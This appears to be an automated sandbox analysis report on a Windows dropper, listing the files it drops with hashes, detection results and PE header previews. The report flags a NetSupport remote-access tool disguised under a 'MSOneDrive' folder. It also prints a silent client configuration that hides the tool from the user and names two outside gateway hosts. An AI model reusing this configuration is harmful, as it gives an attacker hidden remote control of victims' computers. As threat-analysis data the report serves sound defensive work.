                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........Yg=.8.n.8.n.8.nDv.n.8.n..n.8.n.N.n.8.n(..n.8.n..n.8.n.@.n.8.n.8.n.;.n.@.n.8.n.@.n.8.n..n.8.n..n.8.n..n.8.n..n.8.n..n.8.nRich.8.n........................PE..L.....(S...........!........................................................`5......~5.............................0.......$............'............4.P....@3.(.... ..............................p...@....................}..`....................text............................... ..`.rdata..............................@..@.data...(...........................@....tls.................j..............@....hhshare.............l..............@....rsrc....'.......(...n..............@..@.reloc.......@3.......2.............@..B........................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):397176
                                                      Entropy (8bit):6.805828808723932
                                                      Encrypted:false
                                                      SSDEEP:12288:T63kUb4Rtmiqcn1gqjamCcmAPFdOKAeriUAb4yfytX:V5e+mCFEK6bffQX
                                                      MD5:E5C78D4F6A7A886BD5A19A5F9B654A09
                                                      SHA1:D38231380D37981BE65D0FA84E0001F4DDCC568C
                                                      SHA-256:198CA24C0EF0D879CF475DCA9E0858DA4220F8624AEDF815C76CF33D0316C2B4
                                                      SHA-512:E2BFD445B83A53B3F797EFBA4C8FF873CD99CF3B78D2CBDAF1005F09172DB21199E48E19268DD4056F9FF5EB7885CC9192FF7C49E79F8FBE8D69948920887683
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 7%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....HwX...........!................w................................................(....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text...,........................... ..`.rdata../...........................@..@.data...h............~..............@....rsrc...@....0......................@..@.reloc..$F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):10752
                                                      Entropy (8bit):4.761618125965725
                                                      Encrypted:false
                                                      SSDEEP:192:ZW2DrdP1nJc7ve+YIAW1CmfCwAGCBCnh/frjEcCZCW2n2WRQn:sve+YIAW1xeInxrAZCW2n2W
                                                      MD5:45B5D93521B7818CA11B2C7C9E8811A1
                                                      SHA1:AF78BE041408DA9CE79C63B547FDC1CC195CC08E
                                                      SHA-256:44619C9667DD6489DD6693EC07924AE0472BF82AEF9AD85608E988CDA97C2D67
                                                      SHA-512:E2B4805CB3071CD38B8ED88ACE2E8F5C7E0DFB3BCFE11BE3E755798D1637AA064557AE28B4E791F886D336BB7D9CA41599E17C928C9AD23AD5D52443AD548AF2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./.T.A_T.A_T.A_].._D.A_@.B^U.A_@.E^X.A_T.@_~.A_@.@^W.A_@.A^U.A_@.I^V.A_@.._U.A_@.C^U.A_RichT.A_................PE..L....w0............!................`........0...............................p............@A.........................!.......@.......P..@....................`..........T...........................0................@...............................text............................... ..`.data...`....0......................@....idata.......@......................@..@.rsrc...@....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):20632
                                                      Entropy (8bit):6.530792585357305
                                                      Encrypted:false
                                                      SSDEEP:384:vtWK+FI/U8Y02qfc6W4ZW0CtDBRJKgR1lDzV7:EK+gbcEtCt1PKY3V7
                                                      MD5:9EC373D2E9B1251B41277F334DB59609
                                                      SHA1:AC531A8E849F77AD89D433E11205D5DC33DD8EAB
                                                      SHA-256:CFBFB100B3F29F55EED75C3C7A503098EEC7C4070B63559F42EF30911FC7B16F
                                                      SHA-512:3E4475DE9EA35BC95EEBABBA4E91D9CD414AB1B6892D9E3596A3F4AE4EE00671E0BDF1A84E05095EA948A93DA9327833277EB00F2586894FF34BD754CBCA45BE
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=Jc.y+..y+..y+..pS..w+..m@..x+..m@..i+..y+.._+..m@..z+..m@..z+..m@..x+..m@..{+..m@..x+..m@..x+..Richy+..........PE..L....((.........."!................. .......0...............................p............@A........................0)..i....@.......P..(................"...`......0...T........................... ................@...............................text............................... ..`.data...L....0......................@....idata..`....@....... ..............@..@.rsrc...(....P.......&..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):107376
                                                      Entropy (8bit):4.702402773520006
                                                      Encrypted:false
                                                      SSDEEP:384:rmXhuZ758V5+6j6Qa86Fkv2Wr120hZD4otVVtV6is:iEd8VZl6FhWr80/sotVVtV6is
                                                      MD5:F6ABEF857450C97EA74CD8F0EB9A8C0A
                                                      SHA1:A1ACDD10F5A8F8B086E293C6A60C53630AD319FB
                                                      SHA-256:DB0ACB4A3082EDC19CA9A78B059258EA36B4BE16EEE4F1172115FC83E693A903
                                                      SHA-512:B6A2196EBFA51BB3FB8FB2B95AD5275828AB5435FD859FC993E2B3ED92A74799FE1C8B178270F99C79432F39AA9DBC0090038F037FCB651AB75C14B18102671F
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9!..}@.}@.}@.t8E..@....~@.}@.x@....|@...).|@....|@.Rich}@.........................PE..L......Y.....................t...... ........ ....@..................................[....@..................................!..<....0...l...........z..p).......... ..T............................................ .. ............................text............................... ..`.rdata....... ......................@..@.rsrc....l...0...n..................@..@.reloc...............x..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):664
                                                      Entropy (8bit):5.426079899627146
                                                      Encrypted:false
                                                      SSDEEP:12:l7hqH+WX4Ba/vmZ7CVVePb2oGS+u8on4ekLvaCYubluGjI9vykBIYPGY:l7hqeV8uT/yrneruEvykBIKf
                                                      MD5:14F6EBED5E1176F17C18D00A2DC64B2E
                                                      SHA1:CB9C079373658CE098E1D07D4A2C997BF3141B4B
                                                      SHA-256:D4C1F00382F01ABBB3142EF6D9C3E51557D0CED12A52861D8C5DF44D1CE723AC
                                                      SHA-512:E5F24A695749D693E873EA60B8CAAFF5CB3B306887721E3F9F308AFE697FBA37F3A6226322AEDEBB46764D6BBBAF21DF44D4C6A02DB49B067437D7E7D0CCEAF9
                                                      Malicious:false
                                                       Preview (CRLF line breaks restored from the text preview):
                                                       0xe77314c8
                                                       
                                                       [Client]
                                                       _present=1
                                                       DisableChatMenu=1
                                                       DisableDisconnect=1
                                                       DisableReplayMenu=1
                                                       DisableRequestHelp=1
                                                       SOS_RShift=0
                                                       DisableChat=1
                                                       Shared=1
                                                       ValidAddresses.TCP=*
                                                       silent=1
                                                       AlwaysOnTop=0
                                                       SOS_Alt=0
                                                       SysTray=0
                                                       UnloadMirrorOnDisconnect=0
                                                       AutoICFConfig=1
                                                       DisableMessage=1
                                                       SOS_LShift=0
                                                       Usernames=*
                                                       SecurityKey2=dgAAANFUHNynybuwpE8GRawoAgMA
                                                       Protocols=3
                                                       
                                                       [_License]
                                                       quiet=1
                                                       
                                                       [_Info]
                                                       Filename=C:\ProgramData\regid1996-09com.microsoft\client32-u.ini
                                                       
                                                       [General]
                                                       BeepUsingSpeaker=0
                                                       
                                                       [HTTP]
                                                       CMPI=60
                                                       GatewayAddress=armayalitim.com:443
                                                       GSK=HA;F?FCFHL>BBCEEHH:I<J?LED
                                                       Port=443
                                                       SecondaryGateway=armayalitim1722.com:443
                                                       SecondaryPort=443
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):4.3358588850360205
                                                      Encrypted:false
                                                      SSDEEP:96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
                                                      MD5:FAEDA9B43E022ACD3B8462B222EEDC72
                                                      SHA1:9D81571936C9270600E54F7BCA210026F6ECD830
                                                      SHA-256:F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
                                                      SHA-512:5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):4.3358588850360205
                                                      Encrypted:false
                                                      SSDEEP:96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
                                                      MD5:FAEDA9B43E022ACD3B8462B222EEDC72
                                                      SHA1:9D81571936C9270600E54F7BCA210026F6ECD830
                                                      SHA-256:F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
                                                      SHA-512:5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):4.3358588850360205
                                                      Encrypted:false
                                                      SSDEEP:96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
                                                      MD5:FAEDA9B43E022ACD3B8462B222EEDC72
                                                      SHA1:9D81571936C9270600E54F7BCA210026F6ECD830
                                                      SHA-256:F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
                                                      SHA-512:5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5632
                                                      Entropy (8bit):2.6257057833605213
                                                      Encrypted:false
                                                      SSDEEP:48:CLMizve6wUDFgPhIhvsG1eMbotAQqnAwpgS008IZW0H1lXnuIzh/o5WwHgK:4MizvlNDF+MktAXAwoXEWs/n3/sWwr
                                                      MD5:77686C7F73FA932D89BF262002182FD1
                                                      SHA1:95D2B97C00B26A3D327ABA83F5CDF4459736AF87
                                                      SHA-256:BAA1A9D6338CB995A341A18D6003049EC4E14C7588DD8F78D0CEED324301163E
                                                      SHA-512:5BFD67B0DED3FE9967468F69AB2790A2F475D330E8DC4EA8CDE5BE47CC2433A22F48DB547724443130A969F2370BD5A0CC9A602894B340E0899C319DEA6B7376
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%..a...a...a...u...b...a...j...u...g...u...`...u...`...u.s.`...u...`...Richa...........................PE..L..................!......................... ...............................`............@E................................ 0..(....@.......................P..,.......T............................................0...............................text...5........................... ..`.data...$.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..,....P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8704
                                                      Entropy (8bit):4.810621720665765
                                                      Encrypted:false
                                                      SSDEEP:96:9MSvZiG2+XZ9PIzWIY+0y1/wbaDQzf7qfBS9nFJEcMYZcEWIdWwWZ2f:PfJsW7+0AHGfWfBqn7Ec3ZtWIdWH0
                                                      MD5:8881F8445B35C24DC307561809E15A4A
                                                      SHA1:1B76C7657AAEAAC45D39B837E2131B5B4113F599
                                                      SHA-256:0CBEB415A66083408897C5C8D404BFA2B32132CC49C203969125A106AE2C0520
                                                      SHA-512:3B6C764896F9EA30E1BE38496AAF6F16507034D9AE8D6B87046A9A69197061E56657A1E6FB7A1F57E77E73F93CF962E8F122577AED78FE55D984D37554F176A1
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K...........;...........................................W..........Rich...........................PE..L....\.............!................`........ .....t.........................`.......t....@A............................H...d0.......@.......................P..4.......T............................................0..`............................text...8........................... ..`.data...P.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..4....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2560
                                                      Entropy (8bit):3.5862620294630116
                                                      Encrypted:false
                                                      SSDEEP:24:eH1GS3cwXqQnWI2rxDWlJZfWgd/bWuJ0Sto6IZW0gTXNu/2SY35WWdPPYPNy:yDXqQnWtDSd/SOtFIZW39u1m5WwHg
                                                      MD5:EF7D0F1EF60616814125B2FEDD84B0EB
                                                      SHA1:090E43A171926FD20F7C8DA4AC71473E70A44337
                                                      SHA-256:7CF9EEBBA0742BDCCE8763E80FC6E8C724B7FF0B5B2084E757666BFF6397C779
                                                      SHA-512:F8D372C2E574DB8E812DDE924B6391581233E6BDCB2CD4486A0CFD790E76DFD1C711837A9BADDDA9A58B68AC94A028C4166F211AB7F4D46C56152050D6C12393
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L..... ............!..............................@S.........................0.......6....@E........................`................ ..................................T............................................................................text...............................@..@.rsrc........ ......................@..@...... .........!................. .........d...0...0......... .........$............................. .........................................B...j...........................1.......\...............................icmp.dll.IcmpCloseHandle.iphlpapi.IcmpCloseHandle.IcmpCreateFile.iphlpapi.IcmpCreateFile.IcmpParseReplies.iphlpapi.IcmpParseReplies.IcmpSendEcho2.iphlpapi.IcmpSendEcho2.IcmpSendEcho.iphlpapi.IcmpSendEcho.do_echo_rep.iphlpapi.do_echo_rep.do_echo_req.iphlpapi.do_echo_req.re
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8704
                                                      Entropy (8bit):4.790309421557943
                                                      Encrypted:false
                                                      SSDEEP:96:APT8Qw74DEmFTkqZn+2j8FWLqZW95OQbfzDzJEczJDlEWBSWwSULY9K:AW7qEcNIEyQ5OQbfPNEczx+WBSWKf
                                                      MD5:B4B0B3EAB11FFEFD388FC4C3184E85EC
                                                      SHA1:422F096EBC004BD72F3E4BD83E9B8E77E44F90F2
                                                      SHA-256:E9C8544CECBA0B9A5D9D181F5FC87763A5164DA6E60F290AD4AD49DFC466EB06
                                                      SHA-512:06FA240220CB92C9165B2C24A21763C5DC0471AEC3662FF3E56525F3CCF70B347D4F12EACF9D667302FA8956A868DD764A97330FC155AB0B664DC01A8C5C0316
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V.|...|...|....N..|.......|.......|...|...|.......|.......|.......|...."..|.......|..Rich.|..................PE..L...E.}4...........!................p........ ...............................`............@A................................t0.......@.......................P..,...0...T............................................0..p............................text............................... ..`.data...P.... ......................@....idata..(....0......................@..@.rsrc........@......................@..@.reloc..,....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):9216
                                                      Entropy (8bit):4.813302544949798
                                                      Encrypted:false
                                                      SSDEEP:192:AQ4SQSd9hCFA+QABxo6tQABrEczxmWQRWS:cxSDhCe+QABxo6BxmWQRW
                                                      MD5:A5AF6933A1EE4FCF41EE5EC75879B479
                                                      SHA1:BE65C18CCDB50CF622D3A8585B5899DDDCD75531
                                                      SHA-256:E83861E331E90F2A41CD749E33614FB61595C1B9E29D9808B8DD68CC38968C47
                                                      SHA-512:CB6A257EBC10A193E9C75191E2F009C53054CF985ED04A9F3A75D21D9EFD709C015BC80A217740164ED978FD31FDF5DCA44C9E5D4287AE40791990E165BA839B
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\B.=,..=,..=,..E...=,..V/..=,..V(..=,..=-..=,..V-..=,..V,..=,..V%..=,..V..=,..V...=,.Rich.=,.........PE..L..................!.........................0...............................p.......5....@A........................@.......x@.......P.......................`..l.......T............................................@..t............................text............................... ..`.data...p....0......................@....idata..>....@......................@..@.rsrc........P......................@..@.reloc..l....`......."..............@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):18832
                                                      Entropy (8bit):6.4434700117269585
                                                      Encrypted:false
                                                      SSDEEP:384:tKDL6r3uJBAjEOTWikEWEZ1e14gHRN7NslXFTnh:Aa3urdT8GNmt
                                                      MD5:0AB5BACD140CB2A1014A2EF49E56A770
                                                      SHA1:CE60ADF0EF64B3C0B69F4EC69A7BEA855E448D57
                                                      SHA-256:DE699589DB52A7E952B3F2DF186E346B1A68E7AD9F6DC38C390D4A1CEB99FEAC
                                                      SHA-512:025B5301320000DCB09EECB4D0B20CC0F991121A4CCC911A88BDE4D83387FC995A84FE7B7E88907A38AEFA9B35B67C29390220743DC193CD938C45D6F798B390
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........mm[............v~.......t..............uz......uz......uz......uz......uz......uz......uz......Rich............PE..L....L.`.........."!.........................0...............................p............@A........................0"../...p@..P....P..0............&...#...`..L...D...8...............................@............@..h............................text..._........................... ..`.data........0......................@....idata..x....@......................@..@.rsrc...0....P......................@..@.reloc..L....`.......$..............@..B........................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):773968
                                                      Entropy (8bit):6.901559811406837
                                                      Encrypted:false
                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):18920
                                                      Entropy (8bit):7.192716546151935
                                                      Encrypted:false
                                                      SSDEEP:384:iWyH/WgRCQpBj0HRN7da7YQHRN7MWk9flxIphg:c+qWdiY8M/AO
                                                      MD5:39DB58D4965874979F0D45FBB96CA675
                                                      SHA1:AFFFBD2B3DF2D14C19D5E675326658AB6DA9C3CB
                                                      SHA-256:0EC970064D98B5825D78E5CC5CDA6919CE88DAD1D121E8E556872B815A84A497
                                                      SHA-512:34CEEE6503BDF83989AF8F7CC15C513455D13BD1495748B339BC165556116F7B54AA6FBF4505B93E721056B02EF1F8B914EDE91928CDAE4B77866927190D62B0
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.<.1.R.1.R.1.R....0.R...P.0.R.Rich1.R.........PE..L....<.].........."!.........................................................0......<.....@.......................................... ...................A...........................................................................................text...p...........................@..@.rsrc........ ......................@..@.............<.]........T........................rdata......T....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:Windows setup INFormation
                                                      Category:dropped
                                                      Size (bytes):328
                                                      Entropy (8bit):4.93007757242403
                                                      Encrypted:false
                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                      Malicious:false
                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):46
                                                      Entropy (8bit):4.532048032699691
                                                      Encrypted:false
                                                      SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                      MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                      SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                      SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                      SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                      Malicious:false
                                                      Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):45112
                                                      Entropy (8bit):6.86518195777479
                                                      Encrypted:false
                                                      SSDEEP:768:3o6OZSOe0iI6IdE+OPCH4mf6u0Qn+6wwbiRGp9E+yhwBkbp9E+8iROr:3o6mSOqIqPCYmfRnlwwbioQ+yhwBkbQ1
                                                      MD5:9DAA86D91A18131D5CAF49D14FB8B6F2
                                                      SHA1:6B2F7CEB6157909E114A2B05A48A1A2606B5CAF1
                                                      SHA-256:1716640CCE74322F7EE3E3E02B75CD53B91686F66E389D606DAB01BD9F88C557
                                                      SHA-512:9A98E0D9E2DDA8AEFA54BDDB3C7B71501D638DFF68863939DE6CAA117B0E7BF15E581A75419EF8A0DA3F1C56A19F1B0F4C86D65F8581773AB88FF5764B9BB3AA
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~....Z...Z...Z...Z...Z...Z...Z...Z...Z...Z..Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...ZRich...Z................PE..L......^...........!.....6...........@.......P............................................@.........................`c.......[..d.......x............d..8L..........pQ...............................Z..@............P..X............................text...~5.......6.................. ..`.rdata.._....P.......:..............@..@.data....r...p.......P..............@....rsrc...x............R..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):69744
                                                      Entropy (8bit):6.597732994360204
                                                      Encrypted:false
                                                      SSDEEP:1536:rfanvXuNOwphKuyUHTqYXHhrXH4xLIygAormAWXiJ:LanPSpAFUzt0xLIygtgk
                                                      MD5:A67623B4D8C86858115BEE9278B7A742
                                                      SHA1:58BF04265A09EC5E3483CCBC459241C67E928FC7
                                                      SHA-256:B0177CFB8F4D5DFB5C3EC3181CDDABA157771921C1F26C17AED736A605153A0B
                                                      SHA-512:BA1F1FBCB32349DB90C90FF28DB5F7B74452A0629882531222383A5A4ADBF62C31B181B49729C0A1CD971F0C39C6EC33CFE4912C25FBA7430437C7D6F71A9056
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
